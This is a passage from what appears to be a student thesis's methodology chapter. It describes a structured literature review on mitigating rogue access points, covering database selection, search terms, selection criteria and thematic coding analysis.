Friberg (2017) mentions that a literature review takes all the current research to gain a deeper knowledge to both understand the problem but also to find conclusions. The review is also helpful to criticize already performed research.

Earlier work regarding literature reviews by Alotabi & Elleithy (2016), Samra et. al (2015) and Lennartsson (2019) have been conducted and used as inspiration. This helps the study to firmly follow and learn from that research to enhance the study. Instead of blindly diving in to rely on own experiences, this will hopefully be of advantage to make a better review.

4.1 Structured Literature Review

Kumar (2011) recommends a research study to have a clear and visible approach such as a list or model. The reasoning for the importance is to help the research study to a guideline

completion. He also points out that it’s advisable to have a guideline or frame to meet

timelines and to put pressure on the researcher in a structured way for its research objectives.

Fink (2020) explicitly points out the importance of a systematic literature review to follow a specific and precise research question. This is to prevent being overflooded with somewhat related but not exactly related articles. Putting time and focus on a well-developed and precise

(22)

15

research question is an important step in conducting a literature review.

A structured literature review can be divided into three important phases according to

Kitchenham (2014) which are planning, conducting and reporting the review. While Paré and Kitsiou (2017) says that a structured literature review should follow six steps which are as accordingly:

1. Formulate a research question or aim 2. Perform literature searches

3. Apply inclusion and exclusion criteria 4. Perform quality assessment

5. Extract data 6. Analyse data

These six steps represent how the study will be conducted and followed. But the step of planning from Kitchenham (2014) will be included, this is mainly to ensure that the second step from Paré and Kitsiou (2017) is assured of optimal use. The first step, formulate a research question or aim is performed in chapter 3.2 which leads to performing literature searches the next step, but before those can be executed they must be planned.

Kitchenham (2014) emphasises the importance in a clear definition of search strategy for a systematic literature review. This helps the reader to easily judge the conducted research. To avoid biased article selection and make readers follow and understand the conduct study, the process of search strategy must be transparent and replicable. By providing the different steps well documented steps are important to follow.

Jesson, Matheson & Lacey (2011) mentions the importance of continuous documentation. It not only helps the reader but also the researcher. By keeping track of the progress and adjustments of the study helps the researcher if uncertainties of previous steps occur.

Once the research term or aim is defined, literature searches should be performed. But before that several steps need to be decided. by planning the literature searches mentioned earlier.

Planning will include how the literature research should be performed, what resources will be utilized, and predefined criteria that needs to be further established to avoid unbiased

selection processes.

4.1.1 Indexing Services

Backman (2014) recommends the use of electronical resources for literature reviews, arguing the benefits of saving time but also economic costs. Furthermore, a recommendation is to not only settle with a single source of information. Especially in a literature review.

Brereton et al. (2007) points out the fact that acquiring information for a study should not be performed with one single resource. Instead several resources should be used to benefit the unbiased opinion.

As recommended, index services in the form of databases will be utilized in acquiring articles for the thesis. The University of Skövde supplies 78 databases as of now, accessible with the school entry. Some delimitations must be given. Free access is of great use, some databases require a fee for certain articles depending on different variables. So, avoiding the cost of

(23)

16

articles is of importance. Also, Brereton et al. (2007) recommends IEEExplore, ACM Digital Library and ScienceDirect to acquire information in matters of information technology.

Backman (2014) recommends for IT or technological studies to use the database

ScienceDirect. There is also reasoning to utilize Google Scholar, but it is described more as an unknown territory. Mark (2016) explains that Google Scholar is a doubtful resource to use, because the open inclusiveness makes anything that can be mistaken as an article to be

included. Furthermore, the citations are automated, and the profiles are done by the scholars themselves. Several resources are recommended to use and according to earlier mentions, the following databases will be used in this thesis:

➢ ACM Digital Library

➢ IEEExplore

➢ ScienceDirect

4.1.2 Acquiring articles

Backman (2014) explains how scientific communication can be written, spoken and being informal or formal. For example, an informal spoken communication can be a conference which later becomes formal written communication. It is important to remain critical and unbiased to what is acquired. In a literature review, a formal written communication is in majority of interest. Since databases have been chosen to be the search method, formal written communication is accessible.

It is also important to perform proper search terms in acquiring the articles. This is a core step in acquiring articles and to conduct a systematic literature review (Jesson, 2017). With this explained, search terms in use of this thesis must be carefully developed and remain unbiased without making any search terms in favour of the researcher. It is of utmost importance to keep keywords in the search term relevant. If this is not the case, the study might be invalid cause of the irrelevant articles reviewed. Also, a faulty conclusion or hypothesis might be achieved. Backman (2014) points out the importance to the researcher of making good use of given knowledge. Wohlin, Runeson, Ohlsson, Regnell & Wesslén (2012) carefully discusses that finding the relevant studies without getting swarmed by the amount of irrelevant studies is a troublesome task, if not kept in mind. This clarifies that search terms must be targeted to the thesis with mind of time limits and resources at disposal. The researcher will solely review all studies and will in most cases be manually examined. This gives a large time consumption.

It is highly recommended to utilize the resources available from the university.

As Backman (2014) further explains, all resources should be used. This includes the use of modifying and developing the search procedure with boolean operators, depending on

database it could be OR, AND but it’s important to keep in mind to check the database in use of what search terms are appropriate to make the search term of the same kind in all

databases. This should be performed as thorough as possible. Kitchenham (2014) also notes the fact that boolean inclusions/exclusions is a great start to perform a refined and well performed search.

(24)

17

Brereton et al. (2007) also states the fact that databases are not in any way only developed for literature reviews. They all have different syntaxes regarding search terms. Further

explanation declares the vitality of keeping a search term adjusted but in the same searching index in all databases used.

This concludes that boolean operators will be used in the search terms with relevant and carefully tested search terms. It appears complex and a threat to the thesis if one single search term is in use. To acquire relevant studies the single complex search term is instead replaced by several divided search terms which will be possible to use in the selected databases.

Hence recommendations from authors of methodology books as mentioned earlier and

previous literature reviews studied by the researcher. Testing of search terms were performed.

The search terms were carefully tested against the 3 databases that were selected. The most useful search terms tested were:

➢ Mitigate AND RAP

➢ Mitigate AND “Rogue Access Point”

➢ Prevent AND “Rogue Access Point”

➢ Prevent AND RAP

For the possibility for reproduction of this study, exact versions of the search terms will be applied when needed for modification in one or several databases. Since Internet as a source is constantly changing, studies may be removed or added which can cause confusion for the reader when examining the study.

4.1.3 Demarcations

Wholin et al. (2012) points out that inclusion and exclusion criteria are one of the most important steps. These should be decided before the actual searches are performed. The reason for this is to have unbiased criteria. Kitchenham (2014) furthermore declares that studies are suitable to answer the predefined research question if they are approved by the predefined selection criteria. If studies are matching the exclusion criteria, they will be removed from the literature review in this study. The inclusion and exclusion criteria used in this study follow table 1 shown below.

(25)

18

Table 1: Description of predefined selection criteria for study (Author's Own)

Inclusion Criteria

IC1. Peer reviewed IC2. Written in English

IC3. Publications between years 2017 and 2020 IC4. Relevant to the study

IC5. Publication in journals, conferences, review articles

Exclusion Criteria

EC1. Fails to meet inclusion criteria

EC2. Requires a fee, payment, or additional login process EC3. Redundant studies

EC4. Profound methodology results, implementation, conclusions and/or results

EC5. To specific environments

Since studies in general that relates to information technologies are published in English, no other languages are to be included. Loyd Sealy Library (2018) explains that peer-reviewed articles must be evaluated by a process that is used to ensure quality. When articles are peer- reviewed they are further reliable sources of information, ensuring their quality. IC1 is therefore a criterion that helps to ensure that only articles of quality are included.

To further enhance quality in included articles, the requirement for only using journals conferences (IC5). Since articles are forced to undergo a peer-reviewing process before being released. This eliminates articles with poor quality and is in coherence with IC1. Further making sure to use articles of good quality.

Criteria IC3 defines the time frame of article publications to be included. Studies that

originate earlier than 2017 are considered outdated since WPA2 was cracked, as mentioned in the background and earlier research. But further explained by McGee (2017) WPA2 was announced cracked. It had been cracked by the newly discovered attack method KRACK (for Key Reinstallation AttaCK) that could break WPA2 encryption. Therefore, solutions before 2017 are considered unreliable to involve. It is seen as more reliable to include solutions that consider WPA2 being faulty than solutions that expect it to be sufficient.

Following there are several exclusions criteria. These criteria are used to further increase quality assurance and validity. EC1 clearly eliminates articles that are not withholding the earlier mentioned inclusion criteria. EC2 is to ensure that no exclusive literature is gathered. If there are multiple studies with the same implementation, environment, and results. Then there is no need of redundant studies. Applying EC3 will remove such articles. If an article

achieves the inclusion criteria, then methodology, implementation, conclusions, and results

(26)

19

are assessed regarding the question whether they are understandable. If they appear profound, incomplete, or abstruse, then EC4 will remove them. Also, articles with results that are divergent to similar studies. If these studies do not provide an explanation for such scenarios, EC5 will be applied to eliminate them. This is to ensure that the study is using unbiased information.

To remove studies that utilize specific scenarios or exceptional environments, EC6 can be used. If the study is unable to be reproduced, the study is deemed to be less credible and should be avoided as a reference. Also, even though it is not a not a selection criterion, the amount of citations can be used with all selection criteria. This would be to reduce the final bibliography. Important note is that this will only be applied if the total number of valid publications are too much to process for the author.

4.2 Analysis

Since the study will be qualitative and will handle large amounts of data, thematic coding is deemed to be appropriate. According to Backman (2014) a qualitative study can be performed on three different levels depending on research goals. He points out that a thematic qualitative study is of choice when general terms and theories are used to present information as a result.

But it is important to note that this can also generalize the study. The researcher is

recommended to create categories and even subcategories when possible to save time and make the literature review more solid. It also enforces the researcher to look for strict categories where patterns can be developed.

Furthermore Braun & Clarke (2008) describes thematic analysis as a method to identify, analyse and report patterns as themes using data. It organizes and describes data in detail. But in can also further go in depth on different aspects of the research topic (Boyatzis, 1998).

Braun & Clarke (2008) explain thematic analysis as an approach to search across a data set, which can be a distinct number of interviews, focus groups or texts. Driven to find repeated patterns of relevance. The exact form and product of the approach varies, it is important that the form is considered before and reconsidered during the conducted study. The mainline is to produce a finished product, perhaps not detailed. It is a method which is recommended as a solid approach to upcoming and new researchers. Thematic coding is an approach to identify, analyse and to find patterns within large amounts of data.

4.2.1 Choice of analysis method

After a method has been applied and practically been performed. All the information and data that has been collected with the method needs to be analysed. The analysis of choice is

thematic coding.

Thematic coding is described by Braun & Clarke (2006) as a rarely acknowledged but still widely used analytic method. It is an analysis method that is useful for research in qualitative research as this study is. The reason for this is the flexibility and theoretical freedom that the analysis brings. It is also a recommended approach that researchers should perform to learn and understand qualitative studies, due to the fact that it develops the core skills for other qualitative analysis.

(27)

20

Thematic coding is described further by Braun & Clarke (2006) as a qualitative analysis method that identifies, analyses, and creates patterns (themes) within the collected data.

Themes in the context of thematic coding is highly flexible. The matter of themes is to find important parts to the research question and that also can create patterns in the collected data of the literature. It is important to note that themes are not the focus of a data set to become a theme. It can simply be a few but important sentences, neither does it have to exist in more than one data set. Themes can either be a large part of some articles and a lesser part in other articles. Codes according to Braun & Clarke (2006) is something that describes data that the code is referring to or a way to refer to the data the code is intended for. Codes are simply a way to divide and create sections of the collected data. It organizes and describes data in a richer detail.

Thematic coding is less complex then other analysis methods, but it can also lead to a diverse range of the topic being researched. This can be viewed both as an advantage or a

disadvantage that Braun & Clarke (2006) says can be prevented by using a certain set of goals or limitations before the study is engaged. Yet the method is as earlier mentioned flexible if the analysed data becomes quite broad it can also be helpful since new discoveries can be made.

Thematic coding tends to be driven by the researchers theoretical or analytic interest in the area. Which gives an more analysis-driven study. Since the study is qualitative and mainly dependent on finding answers to the research question and not to find exact and thorough answers from the data, but from what the data from the analysis gives. A theoretical thematic coding analysis will be performed. The study is coding for a specific research question which already has been defined, a theoretical approach is more suited as well (Braun & Clarke, 2006).

4.2.2 Practical analysis procedure

Since themes and patterns in the literature needs to be discovered and developed, the first step can be initiated as soon as the collection of data is initialized. Theoretical thematic approach recommends engagement in the literature early to find and develop patterns and themes which leads to points of interests of data while collecting data. The reason for this is to partly save time but also to get engaged in the study immediately (Braun & Clarke, 2006).

Coding and identification of themes is a large part of the study, it needs to be considered during the whole process. Finding and developing patterns -needs to be performed from beginning to the end of the study, it cannot only be performed in the beginning or the end.

Instead as said, simultaneous with the process (Braun & Clarke, 2006).

Thematic coding can be divided in to six phases, they are not ruling and can sometimes need flexibility to fit the research question and what data is collected. Important to note as well is the fact that these phases are a recursive process. While performing the analysis, one might have to move back and forth as suited and it is a process that develops over time. The phases should not be rushed (Braun & Clarke, 2006).

(28)

21

The following phases below was implemented to extract the data that later is presented in chapter 5 results.

• Phase 1: Familiarizing yourself with your data

• Phase 2: Generating initial codes

• Phase 3: searching for themes

• Phase 4: Reviewing themes

• Phase 5: Defining and naming themes

• Phase 6: Producing the report

These phases define the whole analysis process, they will be performed recursive in coherence with the collection of data. As earlier mentioned, this will save time, ease the amount of work and help creating themes and codes while the literature is being analysed (Braun & Clarke, 2006).

4.3 Ethical Considerations

When a systematic literature review is conducted, the researcher must perform searches and present results in an objective manner. A researcher might highlight aspects to enforce or provide solutions to own intents such as a proven theory. This might be faulty and easily done without being unbiased and objective (Kitchenham & Charters, 2007). It is also highly

relevant that publications stay unbiased, positive results are in majority often published compared to negative results (Kitchenham et al., 2010).

When fabricating the selection criteria, it is important to ensure objectivity and being unbiased. Primary research is essential to produce original data and insight within the research. But the findings can be given less to no attention depending on the amount of readers regarding publications. A literature review may inform about known facts, undiscovered knowledge etc. It may be unethical to undertake research without including previous research. Without a review of previous research there is no need for new primary research (Gough, Oliver, & Thomas, 2012).

4.4 Validity

Kvale (2001) explains that qualitative studies often get rejected by scientific establishments.

They are often seen as subjective, unreliable, and invalid. Especially when judging the study with common validity criteria. Validity defined as Kvale (2001) is the way of using truth and correctness of a statement. For example, a person can be described as reliable and trustworthy.

An argument can be valid and convincing. It is important to maintain an unbiased and objective study. Using faulty arguments with no sources to prove cannot be valid.

Fink (2020) refers validity to what degree a measure is applied when evaluating research.

Followingly there are four categories for validity. These are described by Wohlin et al. (2012) while explained how to mitigate as followed by the author: